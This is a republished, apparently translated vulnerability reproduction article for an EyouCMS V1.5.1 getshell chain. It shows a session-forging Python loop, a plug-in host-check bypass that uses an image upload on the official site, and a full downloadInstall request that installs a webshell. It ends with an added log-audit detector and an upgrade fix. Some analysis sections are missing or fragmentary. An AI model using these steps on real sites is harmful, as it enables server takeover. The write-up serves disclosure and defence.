2025-02-27 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains in detail how to reproduce the frontend getshell vulnerability in EyouCMS V1.5.1. The content is of high quality, so the editor shares it here for reference. I hope you will have some understanding of the relevant knowledge after reading it.
0x00 Vulnerability overview
EyouCMS (Yiyou CMS) is an open-source content management system (CMS) based on ThinkPHP, developed by a Chinese internet technology company.
EyouCMS v1.5.1 and earlier contain an arbitrary-user backend login vulnerability and a file inclusion vulnerability. An attacker can set an administrator session from the frontend by calling the API, and the backend remote plug-in download then includes a file from the downloaded archive, which leads to getshell.
0x01 Affected versions
EyouCMS <= V1.5.1
= intval(session('admin_info.role_id'))
admin_info.role_id
(must satisfy: less than or equal to 0)
After setting these three session values, you can enter the backend, as shown in the figure:
Backend remote plug-in download getshell, application/admin/controller/Weapp.php:1235
A $url is passed in and parsed as a URL; the parsed host must be eyoucms.com.
That is, the program only allows plug-ins to be downloaded from the official website, but this check is too simple and can be bypassed.
Next, the download link is requested, the archive is decompressed, and config.php is included.
The check that the plug-in conforms to the plug-in standard runs only after this include, so it no longer helps.
0x04 Vulnerability exploitation
Setting an administrator session from the frontend
First, take the administrator session after a successful login and compare it with the session of an ordinary user who is not logged in.
Administrator:
Ordinary user:
Call the get_token function to set a session entry named admin_login_expire
Then check the session of this ordinary user.
It has been set successfully.
In the same way, we can add admin_id and admin_info.role_id.
But this md5 string obviously does not meet the requirements worked out in the vulnerability analysis, so we keep refreshing the session with a script until a suitable MD5 value appears
# Keep refreshing the session until the MD5 values convert correctly under intval().
# api_psot() and is_number() are the author's helpers; they are not shown in the article.
while 1:
    admin_login_expire = api_psot("admin_login_expire")
    num_10 = admin_login_expire[2:12]
    # all ten characters must be digits so that intval() yields a large expiry value
    if is_number(num_10):
        print("admin_login_expire=", num_10)
        break
while 1:
    role_id = api_psot("admin_info.role_id")
    num_1 = role_id[2:3]
    # a leading hex letter makes intval() return 0, satisfying role_id <= 0
    if num_1 in ["a", "b", "c", "d", "e", "f"]:
        print("role_id=", num_1)
        break
admin_id = api_psot("admin_id")
print("admin_id=", admin_id[2:-1])
Running result:
Session:
After conversion by intval() in application/admin/controller/Base.php:58:
The PHPSESSID is used to enter the backend successfully:
Backend remote plug-in download file inclusion getshell
Next, build the malicious archive. The directory structure is as follows:
weappp\weapp\test\config.php
config.php
The webshell is written into the file content.
Compress it to weappp.zip and change the suffix to jpg.
Go to the official eyoucms.com website and find an image upload point.
For example, the question description in the Q&A module:
https://www.eyoucms.com/ask/
Get the address of the uploaded image:
https://www.eyoucms.com/uploads/allimg/210420/1618908445631562.jpg
Request the plug-in download directly in the browser:
http://192.168.58.180/login.php?m=admin&c=weapp&a=downloadInstall&url=https://www.eyoucms.com/uploads/allimg/210420/1618908445631562.jpg
At this point the webshell has been written successfully:
Visit the webshell:
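An added detection example (not code from the original article or from EyouCMS): a small audit over web-server access logs that reports every backend downloadInstall call and marks as high severity any call whose url parameter points at a user-upload directory or a non-zip file, which is the pattern of the bypass shown above. The log lines, timestamps and file names are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined log format); not taken from a real server.
SAMPLE_LOG = """\
192.168.58.1 - - [20/Apr/2021:10:15:01 +0800] "GET /login.php?m=admin&c=weapp&a=downloadInstall&url=https://www.eyoucms.com/uploads/allimg/210420/1618908445631562.jpg HTTP/1.1" 200 512
192.168.58.1 - - [20/Apr/2021:10:16:30 +0800] "GET /login.php?m=admin&c=weapp&a=downloadInstall&url=https://www.eyoucms.com/weapp/example-plugin.zip HTTP/1.1" 200 512
192.168.58.1 - - [20/Apr/2021:10:17:02 +0800] "GET /index.php?m=home&c=Lists&a=index HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

OFFICIAL_HOSTS = ("www.eyoucms.com", "eyoucms.com")


def audit_download_install(log_text):
    """Return one finding per weapp/downloadInstall request in the log.

    Remote plug-in installs should be rare and administrator-driven, so every
    call is reported at 'info'; a call whose url points outside the official
    host, into an upload directory, or at a non-.zip file is raised to 'high'.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        q = parse_qs(urlparse(m.group("target")).query)
        if (q.get("c", [""])[0].lower(), q.get("a", [""])[0]) != ("weapp", "downloadInstall"):
            continue
        plugin_url = q.get("url", [""])[0]
        remote = urlparse(plugin_url)
        path = remote.path.lower()
        reasons = []
        if remote.hostname not in OFFICIAL_HOSTS:
            reasons.append("host is not the official plug-in site")
        if "/uploads/" in path:
            reasons.append("url points at a user-upload directory")
        if not path.endswith(".zip"):
            reasons.append("url does not point at a .zip plug-in archive")
        findings.append({"ip": m.group("ip"), "time": m.group("ts"), "url": plugin_url,
                         "severity": "high" if reasons else "info", "reasons": reasons})
    return findings
```

The host check alone would not have caught the request from the article; the upload-directory and extension checks are what separate it from a legitimate install.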
0x05 Remediation
Upgrade EyouCMS to V1.5.2 or later.
That is all on how to reproduce the EyouCMS V1.5.1 frontend getshell vulnerability. I hope the above content is of some help to you and that you can learn more from it. If you think the article is good, share it so more people can see it.